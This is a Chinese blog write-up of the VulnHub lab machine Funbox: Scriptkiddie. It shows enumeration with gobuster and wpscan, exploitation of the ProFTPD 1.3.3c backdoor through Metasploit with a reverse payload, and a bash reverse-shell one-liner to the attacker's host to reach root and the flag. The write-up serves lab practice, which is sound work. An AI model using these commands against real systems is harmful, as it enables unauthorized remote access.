vulnhub之Funbox: Scriptkiddie

靶机ip:192.168.181.155

kali IP : 192.168.181.129

首先进行IP扫描

 然后我查看ip端口开启哪些服务

 我们看见他开启了80端口,于是我们打开网页进行查看

 于是我进行目录探测,看看他有没有给我们一些提示

gobuster dir -u http://192.168.181.155/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

于是我认为他们开启了wordpress,于是我打开/wp-admin

 发现他确实有wp,于是我使用wpscan进行查看

wpscan --url http://192.168.181.155/wp-content/ -e --api-token ************

 好像不可以,于是我查看ip端口的协议是否有漏洞,当我查看第一个ftp时就发现有漏洞

 有远程命令执行的漏洞,于是我进行查看

https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor/

他告诉我漏洞利用过程

于是我打开msfconsole

 use 0

show options

  但是我们要增加一个payload

show payloads

 于是进行添加

set payload cmd/unix/reverse

 

于是对靶机进行攻击

rhost 是攻击靶机的ip

lhost 是kali的ip

 于是获得root权限

 于是我将他反弹到kali

bash -c 'bash -i >& /dev/tcp/192.168.181.129/9001 0>&1'

 于是才root目录下获得最终的flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值